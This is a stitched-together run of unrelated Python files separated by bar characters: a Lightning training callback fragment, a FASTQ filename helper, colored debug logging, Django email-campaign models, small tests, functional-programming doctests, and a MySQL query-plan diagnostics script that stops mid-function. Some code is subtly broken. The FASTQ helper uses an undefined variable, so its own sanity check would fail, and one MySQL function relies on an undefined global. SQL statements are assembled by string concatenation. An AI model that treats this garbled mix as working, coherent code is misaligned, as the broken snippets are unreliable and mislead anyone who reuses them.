def on_train_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx) -> None: # type: ignore
"""
Get and log training metrics, perform network update.
"""
ids_linear_head = tuple(batch[SSLDataModuleType.LINEAR_HEAD][0].tolist())
if ids_linear_head not in self.visited_ids:
self.visited_ids.add(ids_linear_head)
loss = self.shared_step(batch, pl_module, is_training=True)
loss.backward()
self.optimizer.step()
self.optimizer.zero_grad()
# log metrics
pl_module.log('ssl_online_evaluator/train/loss', loss)
for metric in self.train_metrics:
pl_module.log(f"ssl_online_evaluator/train/online_{metric.name}", metric, on_epoch=True,
on_step=False) # type: ignore
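# Hedged usage sketch (not part of the original file): the callback is attached to a
# PyTorch Lightning trainer like any other callback. The keyword arguments forwarded to
# the pl_bolts SSLOnlineEvaluator base class (z_dim, num_classes, drop_p, hidden_dim,
# dataset) are placeholders inferred from the attributes used above, not verified here.
#
#   online_eval = SSLOnlineEvaluatorInnerEye(learning_rate=1e-4,
#                                            class_weights=None,
#                                            z_dim=2048,
#                                            num_classes=2,
#                                            dataset="placeholder",
#                                            drop_p=0.2,
#                                            hidden_dim=None)
#   trainer = pl.Trainer(callbacks=[online_eval])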
|
#!/usr/bin/env python3
import os
def get_fastq_file_name(fastq_file):
if fastq_file.endswith(".fastq.gz"):
file_name = os.path.basename(path_to_file).split(".fastq.gz")[0]
return file_name
if fastq_file.endswith(".fq.gz"):
file_name = os.path.basename(path_to_file).split(".fq.gz")[0]
return file_name
if fastq_file.endswith(".fastq"):
file_name = os.path.basename(path_to_file).split(".fastq")[0]
return file_name
if fastq_file.endswith(".fq"):
file_name = os.path.basename(path_to_file).split(".fq")[0]
return file_name
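if __name__ == "__main__":
    # Minimal sanity check for the helper above (hypothetical sample paths,
    # not part of the original script).
    assert get_fastq_file_name("/data/sample1.fastq.gz") == "sample1"
    assert get_fastq_file_name("reads_R1.fq") == "reads_R1"
    print("get_fastq_file_name checks passed")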
|
from __future__ import print_function
import sys
DEBUG_LOG_ENABLED = True
# Debug Levels
DEBUG_LOG_ERROR = 0
DEBUG_LOG_WARN = 1
DEBUG_LOG_INFO = 2
DEBUG_LOG_VERBOSE = 3
# Only output messages up to the INFO level by default.
DEBUG_LOG_LEVEL = DEBUG_LOG_INFO
def debug_print(msg):
"""Print a info debug message."""
return debug_print_info(msg)
def debug_print_level(level, msg):
"""Log a debug message and print it out to standard output stream.
All logging should happen via this function or it's related neighbors so that it can easily be controlled
(e.g. disabled for submission).
level: One of DEBUG_LOG_{ERROR, WARN, INFO, VERBOSE} indicate level of the message to be logged
msg: message to log.
"""
if level < 0:
return
should_log = (level <= DEBUG_LOG_LEVEL and DEBUG_LOG_ENABLED)
if not should_log:
return
# Color the log level prefixes. See
# https://en.wikipedia.org/wiki/ANSI_escape_code#Colors for ANSI color
# codes.
if level == DEBUG_LOG_ERROR:
# Red color
print("\x1b[31m", end='')
print("[ERROR] ", end='')
print("\x1b[0m", end='')
elif level == DEBUG_LOG_WARN:
# Yellow color
print("\x1b[33m", end='')
print("[WARNING] ", end='')
print("\x1b[0m", end='')
elif level == DEBUG_LOG_INFO:
# Green color
print("\x1b[32m", end='')
print("[INFO] ", end='')
print("\x1b[0m", end='')
elif level == DEBUG_LOG_VERBOSE:
# Blue color
print("\x1b[34m", end='')
print("[VERBOSE] ", end='')
print("\x1b[0m", end='')
# Finally log the message
print(msg)
def debug_print_info(msg):
"""Print info debug message."""
return debug_print_level(DEBUG_LOG_INFO, msg)
def debug_print_error(msg):
"""Print error debug message."""
return debug_print_level(DEBUG_LOG_ERROR, msg)
def debug_print_warn(msg):
"""Print warning debug message."""
return debug_print_level(DEBUG_LOG_WARN, msg)
def debug_print_verbose(msg):
"""Print verbose debug message."""
return debug_print_level(DEBUG_LOG_VERBOSE, msg)
def stderr_print(msg):
"""Print a msg to stderr."""
print(msg, file=sys.stderr)
def stdout_print(msg):
"""Print msg as is without any extra new lines."""
print(msg, file=sys.stdout, end='')
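if __name__ == "__main__":
    # Small demonstration of the level gating (not part of the original module):
    # with DEBUG_LOG_LEVEL left at DEBUG_LOG_INFO, the verbose call prints nothing.
    debug_print_error("something went wrong")
    debug_print_warn("heads up")
    debug_print_info("just so you know")
    debug_print_verbose("suppressed at the default level")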
|
from django.db import models
from django.contrib.auth.models import User
class Profile(models.Model):
email = models.EmailField(blank=True)
def __str__(self):
return self.email
class Invalidmail(models.Model):
email = models.EmailField(blank=True)
def __str__(self):
return self.email
class Customer(models.Model):
user = models.OneToOneField(User, null=True, on_delete=models.CASCADE)
name = models.CharField(max_length=200, null=True,blank=True)
    objects = models.Manager()
def __str__(self):
return self.name
class Email(models.Model):
my_customer = models.ForeignKey(Customer, null=True, on_delete=models.SET_NULL, related_name='mycust')
name = models.CharField(max_length=200, null=True)
upload_file = models.FileField(upload_to='CSV', null=True, blank=True)
def __str__(self):
return self.name
class Campaign(models.Model):
name = models.CharField(max_length=200, null=True)
sender_name = models.CharField(max_length=200, null=True)
sender_email = models.CharField(max_length=200, null=True)
email_subject = models.CharField(max_length=200, null=True)
my_customer = models.ForeignKey(Customer, null=True, on_delete=models.SET_NULL, related_name='mycustomer')
camp_emails = models.ForeignKey(Email, null=True, on_delete=models.SET_NULL, related_name='camp_email')
def __str__(self):
return self.name
class CampMail(models.Model):
campaignings = models.OneToOneField(Campaign, null=True, on_delete=models.CASCADE)
name = models.CharField(max_length=200, null=True)
    camp = models.ManyToManyField(Email, related_name='emailings', blank=True)
def __str__(self):
return self.name
|
__author__ = 'Evgeny Demchenko'
__email__ = 'little_pea@list.ru'
__version__ = '0.1.0'
|
from task_selector.task import Task
def test_initializer():
task = Task("a", ["1"], 1)
assert isinstance(task, Task)
assert task.profit == 1.0
assert isinstance(task.profit, float)
assert len(task.resources) == 1
def test_equality():
task = Task("a", ["1", "5", "8"], 1)
task2 = Task("a", ["8", "5", "1"], 1.0)
assert task == task2
|
'''This program takes a single integer as
input and returns the sum of the integers from zero to the input parameter.'''
def addGivenInput(n):
try:
result = sum(range(n + 1))
except TypeError:
result = "this is not valid postive number"
return result
print(addGivenInput(5))
print("***************")
print(addGivenInput(-0.1))
|
#!/usr/bin/env python3
"""Functional Python Programming
Chapter 13, Example Set 1
"""
# pylint: disable=unused-wildcard-import,wrong-import-position,unused-import
from typing import Iterable
from functools import reduce
def prod(data: Iterable[int]) -> int:
"""
>>> prod((1,2,3))
6
"""
return reduce(lambda x, y: x*y, data, 1)
year_cheese = [
(2000, 29.87), (2001, 30.12), (2002, 30.6), (2003, 30.66),
(2004, 31.33), (2005, 32.62), (2006, 32.73), (2007, 33.5),
(2008, 32.84), (2009, 33.02), (2010, 32.92)
]
from typing import Callable, Sequence, TypeVar
T_ = TypeVar("T_")
fst: Callable[[Sequence[T_]], T_] = lambda x: x[0]
snd: Callable[[Sequence[T_]], T_] = lambda x: x[1]
x = min(year_cheese, key=snd)
test_itemgetter = """
>>> from operator import itemgetter
>>> itemgetter(0)([1, 2, 3])
1
>>> min(year_cheese, key=snd)
(2000, 29.87)
>>> max(year_cheese, key=itemgetter(1))
(2007, 33.5)
"""
# from collections import namedtuple
# YearCheese = namedtuple( "YearCheese", ("year", "cheese") )'
from typing import NamedTuple
class YearCheese(NamedTuple):
year: int
cheese: float
year_cheese_2 = list(YearCheese(*yc) for yc in year_cheese)
test_year_cheese_2 = """
>>> year_cheese_2 # doctest: +NORMALIZE_WHITESPACE
[YearCheese(year=2000, cheese=29.87), YearCheese(year=2001, cheese=30.12),
YearCheese(year=2002, cheese=30.6), YearCheese(year=2003, cheese=30.66),
YearCheese(year=2004, cheese=31.33), YearCheese(year=2005, cheese=32.62),
YearCheese(year=2006, cheese=32.73), YearCheese(year=2007, cheese=33.5),
YearCheese(year=2008, cheese=32.84), YearCheese(year=2009, cheese=33.02),
YearCheese(year=2010, cheese=32.92)]
"""
test_attrgetter = """
>>> from operator import attrgetter
>>> min( year_cheese_2, key=attrgetter('cheese') )
YearCheese(year=2000, cheese=29.87)
>>> max( year_cheese_2, key=lambda x: x.cheese )
YearCheese(year=2007, cheese=33.5)
"""
g_f = [
1, 1/12, 1/288, -139/51840, -571/2488320, 163879/209018880,
5246819/75246796800
]
g = [
(1, 1), (1, 12), (1, 288), (-139, 51840),
(-571, 2488320), (163879, 209018880),
(5246819, 75246796800)
]
from itertools import starmap
from fractions import Fraction
test_starmap1 = """
>>> from operator import truediv
>>> round( sum( starmap( truediv, g ) ), 6 )
1.084749
>>> round( sum( g_f ), 6 )
1.084749
>>> f= sum( Fraction(*x) for x in g )
>>> f
Fraction(81623851739, 75246796800)
>>> round( float(f), 6 )
1.084749
"""
from itertools import zip_longest
test_starmap2 = """
>>> from operator import truediv
>>> p = (3, 8, 29, 44)
>>> d = starmap( pow, zip_longest([], range(4), fillvalue=60) )
>>> pi = sum( starmap( truediv, zip( p, d ) ) )
>>> pi
3.1415925925925925
>>> d = starmap( pow, zip_longest([], range(4), fillvalue=60) )
>>> pi = sum( map( truediv, p, d ) )
>>> pi
3.1415925925925925
"""
def fact(n: int) -> int:
"""
>>> fact(0)
1
>>> fact(1)
1
>>> fact(2)
2
>>> fact(3)
6
>>> fact(4)
24
"""
f = {
n == 0: lambda n: 1,
n == 1: lambda n: 1,
n == 2: lambda n: 2,
n > 2: lambda n: fact(n-1)*n
}[True]
return f(n)
from typing import Callable, Tuple, List
from operator import itemgetter
def semifact(n: int) -> int:
"""
>>> semifact(0)
1
>>> semifact(1)
1
>>> semifact(2)
2
>>> semifact(3)
3
>>> semifact(4)
8
>>> semifact(5)
15
>>> semifact(9)
945
"""
alternatives: List[Tuple[bool, Callable[[int], int]]] = [
(n == 0, lambda n: 1),
(n == 1, lambda n: 1),
(n == 2, lambda n: 2),
(n > 2, lambda n: semifact(n-2)*n)
]
_, f = next(filter(itemgetter(0), alternatives))
return f(n)
def semifact2(n: int) -> int:
"""
>>> semifact2(9)
945
"""
alternatives = [
(lambda n: 1) if n == 0 else None,
(lambda n: 1) if n == 1 else None,
(lambda n: 2) if n == 2 else None,
(lambda n: semifact2(n-2)*n) if n > 2 else None
]
f = next(filter(None, alternatives))
return f(n)
# Here's a "stub" definition for a class that includes
# the minimal feature set for comparison.
# These are often in a module in the `stubs` directory.
from abc import ABCMeta, abstractmethod
from typing import TypeVar, Any
# pylint: disable=pointless-statement,multiple-statements
class Rankable(metaclass=ABCMeta):
@abstractmethod
def __lt__(self, other: Any) -> bool: ...
@abstractmethod
def __gt__(self, other: Any) -> bool: ...
@abstractmethod
def __le__(self, other: Any) -> bool: ...
@abstractmethod
def __ge__(self, other: Any) -> bool: ...
RT = TypeVar('RT', bound=Rankable)
def non_strict_max(a: RT, b: RT) -> RT:
"""
>>> non_strict_max( 2, 2 )
2
>>> non_strict_max( 3, 5 )
5
>>> non_strict_max( 11, 7 )
11
"""
f = {a >= b: lambda: a, b >= a: lambda: b}[True]
return f()
test_starmap3 = """
>>> from itertools import count, takewhile
>>> from operator import truediv
>>> num = map(fact, count())
>>> den = map(semifact, (2*n+1 for n in count()))
>>> terms = takewhile(
... lambda t: t > 1E-15, map(truediv, num, den))
>>> round( float(2*sum(terms)), 8 )
3.14159265
"""
test_reduction = """
>>> import functools, operator
>>> sum= functools.partial( functools.reduce, operator.add )
>>> sum([1,2,3])
6
>>> prod = functools.partial( functools.reduce, operator.mul )
>>> prod( [1,2,3,4] )
24
>>> fact = lambda n: 1 if n < 2 else n*prod( range(1,n) )
>>> fact(4)
24
>>> fact(0)
1
>>> fact(1)
1
"""
test_unordered = """
>>> {'a': 1, 'a': 2}
{'a': 2}
"""
__test__ = {
"test_itemgetter": test_itemgetter,
"test_attrgetter": test_attrgetter,
"test_year_cheese_2": test_year_cheese_2,
"test_starmap1": test_starmap1,
"test_starmap2": test_starmap2,
"test_starmap3": test_starmap3,
"test_reduction": test_reduction,
"test_unordered": test_unordered,
}
def test():
import doctest
doctest.testmod(verbose=1)
if __name__ == "__main__":
test()
|
#!/usr/bin/python3
# ------------------------------------------------------------------------
# author : Shane.Qian#foxmail.com
# createdat : Wednesday, June 19, 2019 PM06:50:11 CST @ China
# ------------------------------------------------------------------------
# description : fmt mysql sql explain output with others info collection.
# ------------------------------------------------------------------------
import configparser
import datetime
import getopt
# import pprint
# import string
import sys
from warnings import filterwarnings
import MySQLdb
import sql_metadata
import sqlparse
from prettytable import PrettyTable
from sqlparse.sql import Identifier, IdentifierList
from sqlparse.tokens import DML, Keyword
filterwarnings('ignore', category=MySQLdb.Warning)
if sys.version > '3':
PY3PLUS = True
else:
PY3PLUS = False
SYS_PARM_FILTER = (
'BINLOG_CACHE_SIZE',
'BULK_INSERT_BUFFER_SIZE',
'HAVE_PARTITION_ENGINE',
'HAVE_QUERY_CACHE',
'INTERACTIVE_TIMEOUT',
'JOIN_BUFFER_SIZE',
'KEY_BUFFER_SIZE',
'KEY_CACHE_AGE_THRESHOLD',
'KEY_CACHE_BLOCK_SIZE',
'KEY_CACHE_DIVISION_LIMIT',
'LARGE_PAGES',
'LOCKED_IN_MEMORY',
'LONG_QUERY_TIME',
'MAX_ALLOWED_PACKET',
'MAX_BINLOG_CACHE_SIZE',
'MAX_BINLOG_SIZE',
'MAX_CONNECT_ERRORS',
'MAX_CONNECTIONS',
'MAX_JOIN_SIZE',
'MAX_LENGTH_FOR_SORT_DATA',
'MAX_SEEKS_FOR_KEY',
'MAX_SORT_LENGTH',
'MAX_TMP_TABLES',
'MAX_USER_CONNECTIONS',
'OPTIMIZER_PRUNE_LEVEL',
'OPTIMIZER_SEARCH_DEPTH',
'QUERY_CACHE_SIZE',
'QUERY_CACHE_TYPE',
'QUERY_PREALLOC_SIZE',
'RANGE_ALLOC_BLOCK_SIZE',
'READ_BUFFER_SIZE',
'READ_RND_BUFFER_SIZE',
'SORT_BUFFER_SIZE',
'SQL_MODE',
'TABLE_CACHE',
'THREAD_CACHE_SIZE',
'TMP_TABLE_SIZE',
'WAIT_TIMEOUT'
)
def print_table(p_title_list, p_data_list, p_align=[]):
x = PrettyTable(p_title_list)
x.padding_width = 1
for i in range(0, len(p_align)):
if p_align[i] == "l":
x.align[p_title_list[i]] = "l"
elif p_align[i] == "r":
x.align[p_title_list[i]] = "r"
else:
pass
for rec in p_data_list:
if not isinstance(rec, list):
rec = list(rec)
x.add_row(rec)
print(x)
def is_subselect(parsed):
if not parsed.is_group:
return False
for item in parsed.tokens:
if item.ttype is DML and item.value.upper() == 'SELECT':
return True
return False
def extract_from_part(parsed):
from_seen = False
for item in parsed.tokens:
# print item.ttype,item.value
if from_seen:
if is_subselect(item):
for x in extract_from_part(item):
yield x
elif item.ttype is Keyword:
                return  # PEP 479: raising StopIteration inside a generator is a RuntimeError in Python 3.7+
else:
yield item
elif item.ttype is Keyword and item.value.upper() == 'FROM':
from_seen = True
def extract_table_identifiers(token_stream):
for item in token_stream:
if isinstance(item, IdentifierList):
for identifier in item.get_identifiers():
yield identifier.get_real_name()
elif isinstance(item, Identifier):
yield item.get_real_name()
# It's a bug to check for Keyword here, but in the example
# above some tables names are identified as keywords...
elif item.ttype is Keyword:
yield item.value
def extract_tables(p_sqltext):
stream = extract_from_part(sqlparse.parse(p_sqltext)[0])
return list(extract_table_identifiers(stream))
def f_find_in_list(myList, value):
try:
for v in range(0, len(myList)):
if value == myList[v]:
return 1
return 0
except BaseException:
return 0
def f_get_parm(p_dbinfo):
conn = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = conn.cursor()
try:
cursor.execute("select lower(variable_name),variable_value from INFORMATION_SCHEMA.GLOBAL_VARIABLES where upper(variable_name) in ('" + "','".join(list(SYS_PARM_FILTER)) + "') order by variable_name")
except BaseException:
cursor.execute("select lower(variable_name),variable_value from performance_schema.global_variables where upper(variable_name) in ('" + "','".join(list(SYS_PARM_FILTER)) + "') order by variable_name")
records = cursor.fetchall()
cursor.close()
conn.close()
return records
def f_print_parm(p_parm_result):
print("\033[1;31;40m%s\033[0m" % "===== SYSTEM PARAMETER =====")
v_data = []
for i in range(0, len(p_parm_result)):
if 'size' in p_parm_result[i][0]:
if int(p_parm_result[i][1]) >= 1024 * 1024 * 1024:
v_data.append([p_parm_result[i][0], str(round(int(p_parm_result[i][1]) / 1024 / 1024 / 1024, 2)) + ' G'])
elif int(p_parm_result[i][1]) >= 1024 * 1024:
v_data.append([p_parm_result[i][0], str(round(int(p_parm_result[i][1]) / 1024 / 1024, 2)) + ' M'])
elif int(p_parm_result[i][1]) >= 1024:
v_data.append([p_parm_result[i][0], str(round(int(p_parm_result[i][1]) / 1024, 2)) + ' K'])
else:
v_data.append([p_parm_result[i][0], p_parm_result[i][1] + ' B'])
else:
pass
print_table(['parameter_name', 'value'], v_data, ['l', 'r'])
print()
def f_get_optimizer_switch(p_dbinfo):
conn = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = conn.cursor()
try:
cursor.execute("select variable_value from INFORMATION_SCHEMA.GLOBAL_VARIABLES where upper(variable_name)='OPTIMIZER_SWITCH'")
except BaseException:
cursor.execute("select variable_value from performance_schema.global_variables where upper(variable_name)='OPTIMIZER_SWITCH'")
records = cursor.fetchall()
cursor.close()
conn.close()
result = []
for o in str(records[0][0]).split(','):
result.append([o.split('=')[0], o.split('=')[1]])
return result
def f_print_optimizer_switch(p_optimizer_switch_result):
print("\033[1;31;40m%s\033[0m" % "===== OPTIMIZER SWITCH =====")
print_table(['switch_name', 'value'], p_optimizer_switch_result, ['l', 'r'])
print()
def f_exec_sql(p_dbinfo, p_sqltext, p_option):
results = {}
conn = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = conn.cursor()
if f_find_in_list(p_option, 'STATUS'):
# cursor.execute("select concat(upper(left(variable_name,1)),substring(lower(variable_name),2,(length(variable_name)-1))) var_name,variable_value var_value from INFORMATION_SCHEMA.SESSION_STATUS where variable_name in('"+"','".join(tuple(SES_STATUS_ITEM))+"') order by 1")
try:
cursor.execute("select concat(upper(left(variable_name,1)),substring(lower(variable_name),2,(length(variable_name)-1))) var_name,variable_value var_value from INFORMATION_SCHEMA.SESSION_STATUS order by 1")
except BaseException:
cursor.execute("select concat(upper(left(variable_name,1)),substring(lower(variable_name),2,(length(variable_name)-1))) var_name,variable_value var_value from performance_schema.session_status order by 1")
records = cursor.fetchall()
results['BEFORE_STATUS'] = dict(records)
cursor.execute(p_sqltext)
cursor.execute("show status like 'Last_query_cost'")
records = cursor.fetchall()
results['LQC_STATUS'] = dict(records)
try:
cursor.execute("select concat(upper(left(variable_name,1)),substring(lower(variable_name),2,(length(variable_name)-1))) var_name,variable_value var_value from INFORMATION_SCHEMA.SESSION_STATUS order by 1")
except BaseException:
cursor.execute("select concat(upper(left(variable_name,1)),substring(lower(variable_name),2,(length(variable_name)-1))) var_name,variable_value var_value from performance_schema.session_status order by 1")
records = cursor.fetchall()
results['AFTER_STATUS'] = dict(records)
if f_find_in_list(p_option, 'PROFILING'):
cursor.execute("set profiling=1")
cursor.execute("select ifnull(max(query_id),0) from INFORMATION_SCHEMA.PROFILING")
records = cursor.fetchall()
            # sq: 'p_sqltext' has to be run twice (once for status, once for profiling)
            # sq: when both are enabled - otherwise 'query_id' is not reliable
            query_id = records[0][0] + 2  # skip the current statement and point to the next sql
# print("query_id:"+str(query_id))
cursor.execute(p_sqltext)
# cursor.execute("show profiles")
# print_table(["query_id", "duration", "query"], cursor.fetchall())
cursor.execute("set profiling=0")
cursor.execute("select STATE,DURATION,CPU_USER,CPU_SYSTEM,BLOCK_OPS_IN,BLOCK_OPS_OUT ,MESSAGES_SENT ,MESSAGES_RECEIVED ,PAGE_FAULTS_MAJOR ,PAGE_FAULTS_MINOR ,SWAPS from INFORMATION_SCHEMA.PROFILING where query_id=" + str(query_id) + " order by seq")
records = cursor.fetchall()
results['PROFILING_DETAIL'] = records
cursor.execute("SELECT STATE,SUM(DURATION) AS Total_R,ROUND(100*SUM(DURATION)/(SELECT SUM(DURATION) FROM INFORMATION_SCHEMA.PROFILING WHERE QUERY_ID=" + str(query_id) + "),2) AS Pct_R,COUNT(*) AS Calls,SUM(DURATION)/COUNT(*) AS R_Call FROM INFORMATION_SCHEMA.PROFILING WHERE QUERY_ID=" + str(query_id) + " GROUP BY STATE ORDER BY Total_R DESC")
records = cursor.fetchall()
results['PROFILING_SUMMARY'] = records
cursor.close()
conn.close()
return results
def f_get_hit(p_dbinfo):
results = []
conn = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = conn.cursor()
# show engine innodb status
cursor.execute("""
SELECT concat(round(P1.variable_value/(P2.variable_value + P1.variable_value)*100, 4), '%'), P1.variable_value, P2.variable_value
FROM performance_schema.global_status P1, performance_schema.global_status P2
WHERE P1.variable_name = 'innodb_buffer_pool_read_requests' AND P2.variable_name = 'innodb_buffer_pool_reads'
""")
results = cursor.fetchall()
res_tmp = list(results[0])
cursor.execute("""
SELECT sec_to_time(variable_value)
FROM performance_schema.global_status
WHERE variable_name in ('uptime', 'uptime_since_flush_status')
""")
for r in cursor.fetchall():
res_tmp = res_tmp + [r[0], ]
cursor.execute("""
SELECT round(P1.variable_value/P2.variable_value, 2)
FROM performance_schema.global_status P1, performance_schema.global_status P2
WHERE P1.variable_name = 'questions' AND P2.variable_name = 'uptime'
""")
for r in cursor.fetchall():
res_tmp = res_tmp + [r[0], ]
# cursor.execute("""
# SELECT round((P1.variable_value + P2.variable_value)/P3.variable_value, 2), P1.variable_value, P2.variable_value
# FROM performance_schema.global_status P1, performance_schema.global_status P2, performance_schema.global_status P3
# WHERE P1.variable_name = 'com_commit' AND P2.variable_name = 'com_rollback' AND P2.variable_name = 'uptime'
# """)
# for r in cursor.fetchall():
# res_tmp = res_tmp + [r[0], r[1], r[2], ]
cursor.execute("show global status where variable_name in ('com_commit','com_rollback', 'uptime')")
c = []
for r in cursor.fetchall():
c = c + [int(r[1]), ]
res_tmp = res_tmp + [round((c[0] + c[1]) / c[2], 2), c[0], c[1], ]
cursor.execute("""
SELECT variable_value
FROM performance_schema.global_status
WHERE variable_name in ('threads_connected', 'threads_running')
""")
for r in cursor.fetchall():
res_tmp = res_tmp + [r[0], ]
cursor.close()
conn.close()
return (res_tmp,)
def f_print_hit(p_hit_data):
print("\033[1;31;40m%s\033[0m" % "===== HIT (GLOBAL) =====")
print_table(['hit', 'reqs', 'reads', 'uptime', 'uptime_since_flush_status', 'qps', 'tps', 'commit', 'rollback', 'threads_con', 'threads_run'], p_hit_data, ['l', 'r', 'r', 'r', 'r', 'r', 'r', 'r', 'r', 'r', 'r'])
print()
def f_print_extr(p_dbinfo):
results = []
conn = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = conn.cursor()
print("\033[1;31;40m%s\033[0m" % "===== EXTR (ACCOUNT) =====")
cursor.execute("show open tables where in_use != 0 or name_locked != 0")
print_table(['db', 'tab', 'in_use', 'name_locked'], cursor.fetchall(), ['l', 'r', 'r', 'r'])
cursor.execute("show global variables like '%lock%'")
print_table(['var', 'val'], cursor.fetchall(), ['l', 'r'])
cursor.execute("show full processlist") # note: privilege scope
print_table(['id', 'user', 'host', 'db', 'cmd', 'time', 'state', 'info'], cursor.fetchall(), ['l', 'r', 'r', 'r', 'r', 'r', 'r', 'r'])
print({"account": p_dbinfo[2]})
print()
cursor.close()
conn.close()
return results
def f_calc_status(p_before_status, p_after_status):
results = []
for key in sorted(p_before_status.keys()):
if p_before_status[key] != p_after_status[key]:
results.append([key, p_before_status[key], p_after_status[key], str(float(p_after_status[key]) - float(p_before_status[key]))])
return results
def f_print_status(p_status_data):
print("\033[1;31;40m%s\033[0m" % "===== SESSION STATUS (DIFFERENT) =====")
print_table(['status_name', 'before', 'after', 'diff'], p_status_data, ['l', 'r', 'r', 'r'])
print(exec_result['LQC_STATUS'])
print()
def f_print_time(p_title_additional, p_starttime, p_endtime):
print("\033[1;31;40m%s\033[0m" % ("===== EXECUTE TIME (" + str.rstrip(p_title_additional, '+') + ") ====="))
print(timediff(p_starttime, p_endtime))
print()
def f_print_profiling(p_profiling_detail, p_profiling_summary):
print("\033[1;31;40m%s\033[0m" % "===== SQL PROFILING (DETAIL) =====")
print_table(['state', 'duration', 'cpu_user', 'cpu_sys', 'bk_in', 'bk_out', 'msg_s', 'msg_r', 'p_f_ma', 'p_f_mi', 'swaps'], p_profiling_detail, ['l', 'r', 'r', 'r', 'r', 'r', 'r', 'r', 'r', 'r', 'r'])
print('bk_in: block_ops_in')
print('bk_out: block_ops_out')
print('msg_s: message sent')
print('msg_r: message received')
print('p_f_ma: page_faults_major')
print('p_f_mi: page_faults_minor')
print()
print("\033[1;31;40m%s\033[0m" % "===== SQL PROFILING (SUMMARY) =====")
print_table(['state', 'total_r', 'pct_r', 'calls', 'r/call'], p_profiling_summary, ['l', 'r', 'r', 'r', 'r'])
print()
def f_get_sqlplan(p_dbinfo, p_sqltext):
results = {}
db = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = db.cursor()
    # 'EXTENDED' is deprecated.
# # cursor.execute("explain extended " + p_sqltext)
cursor.execute("explain " + p_sqltext)
records = cursor.fetchall()
results['SQLPLAN'] = records
cursor.execute("show warnings")
records = cursor.fetchall()
results['WARNING'] = records
cursor.close()
db.close()
return results
def f_null(p_value):
    if not p_value:
        return ''
    return p_value
def f_print_sqlplan(p_sqlplan, p_warning, p_mysql_version):
# plan_title = ('id', 'select_type', 'table', 'type', 'possible_keys', 'key', 'key_len', 'ref', 'rows', 'filtered', 'Extra')
print("\033[1;31;40m%s\033[0m" % "===== SQL PLAN =====")
ver_maj = int(p_mysql_version.split('.')[0])
ver_min = int(p_mysql_version.split('.')[1])
if (ver_maj == 5 and ver_min >= 7) or (ver_maj > 5): # >=5.7
print_table(['id', 'select_type', 'table', 'partitions', 'type', 'possible_keys', 'key', 'key_len', 'ref', 'rows', 'filtered', 'Extra'], p_sqlplan, ['r', 'l', 'l', 'l', 'l', 'l', 'l', 'l', 'l', 'r', 'r', 'l'])
else:
print_table(['id', 'select_type', 'table', 'type', 'possible_keys', 'key', 'key_len', 'ref', 'rows', 'filtered', 'Extra'], p_sqlplan, ['r', 'l', 'l', 'l', 'l', 'l', 'l', 'l', 'r', 'r', 'l'])
print()
print("\033[1;31;40m%s\033[0m" % "===== OPTIMIZER REWRITE SQL =====")
for row in p_warning:
print(sqlparse.format(row[2], reindent=True, keyword_case='upper', strip_comments=True))
print()
def f_get_table(p_dbinfo, p_sqltext):
r_tables = []
db = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = db.cursor()
cursor.execute("explain " + p_sqltext)
rows = cursor.fetchall()
for row in rows:
table_name = row[2]
if '<' in table_name:
continue
if len(r_tables) == 0:
r_tables.append(table_name)
        elif f_find_in_list(r_tables, table_name) == 0:
r_tables.append(table_name)
cursor.close()
db.close()
return r_tables
def f_get_tableinfo(p_dbinfo, p_tablename):
db = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = db.cursor()
# cursor.execute("select table_name,engine,row_format as format,table_rows,avg_row_length as avg_row,round((data_length+index_length)/1024/1024,2) as total_mb,round((data_length)/1024/1024,2) as data_mb,round((index_length)/1024/1024,2) as index_mb from information_schema.tables where table_schema='"+p_dbinfo[4]+"' and table_name='"+p_tablename+"'")
cursor.execute("select a.table_name,a.engine,a.row_format as format,a.table_rows,a.avg_row_length as avg_row,round((a.data_length+a.index_length)/1024/1024,2) as total_mb,round((a.data_length)/1024/1024,2) as data_mb,round((a.index_length)/1024/1024,2) as index_mb,a.create_time,b.last_update last_analyzed from information_schema.tables a ,mysql.innodb_table_stats b where a.table_schema=b.database_name and a.table_name=b.table_name and a.table_schema='" + p_dbinfo[4] + "' and a.table_name='" + p_tablename + "'")
records = cursor.fetchall()
cursor.close()
db.close()
return records
def f_print_tableinfo(p_table_stat):
print_table(['table_name', 'engine', 'format', 'table_rows', 'avg_row', 'total_mb', 'data_mb', 'index_mb', 'create_time', 'last_analyzed'], p_table_stat, ['l', 'l', 'l', 'r', 'r', 'r', 'r', 'r', 'c', 'c'])
def f_get_indexinfo(p_dbinfo, p_tablename):
db = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = db.cursor()
cursor.execute("select index_name,non_unique,seq_in_index,column_name,collation,cardinality,nullable,index_type from information_schema.statistics where table_schema='" + p_dbinfo[4] + "' and table_name='" + p_tablename + "' order by 1,3")
records = cursor.fetchall()
cursor.close()
db.close()
return records
def f_print_indexinfo(p_index_info):
if len(p_index_info) > 0:
print_table(['index_name', 'non_unique', 'seq_in_index', 'column_name', 'collation', 'cardinality', 'nullable', 'index_type'], p_index_info, ['l', 'r', 'r', 'l', '', 'r', 'r', 'l'])
def f_get_indexstat(p_dbinfo, p_tablename):
db = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = db.cursor()
